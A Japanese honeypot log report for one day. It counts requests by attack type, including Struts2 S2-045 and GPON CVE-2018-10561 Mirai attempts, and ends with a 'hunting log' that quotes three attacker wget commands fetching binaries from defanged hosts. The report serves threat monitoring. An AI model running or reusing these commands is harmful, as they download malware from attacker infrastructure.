ハニーポットのログ分析(2018/12/07)
WOWhoneypotの2018/12/07(運用184日目)の簡易分析です。
本日の総アクセス件数は 98件です。
以下が全アクセスログです。
件数 | 日付 | 種別 | リクエスト |
55 | 2018-12-07 | アクセス | GET / |
32 | 2018-12-07 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /index.action |
6 | 2018-12-07 | WordPressの調査 | POST /wp-login.php |
1 | 2018-12-07 | GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃 | POST /GponForm/diag_Form?images/ |
1 | 2018-12-07 | サイト構成調査 | GET /sitemap.xml |
1 | 2018-12-07 | クローリング | GET /robots.txt |
1 | 2018-12-07 | アクセス | GET /favicon.ico |
1 | 2018-12-07 | Dataprovider[.]comによる調査 | GET /ads.txt |
久々に来たGponの調査行為は「User-Agent: Hentai/2.0」でした。
本日のドメイン名でのアクセスは以下です。
7 GET /
6 POST /wp-login.php
1 GET /sitemap.xml
1 GET /robots.txt
1 GET /ads.txt
本日のハンティングログは以下です。
5 2018-12-07 wget -c hxxp://wap.tfddos.net:57843/linux
4 2018-12-07 wget -c hxxp://154.85.99.85:8080/53252.6
1 2018-12-07 wget hxxp://103.45.109.111:5778/root1
以上です。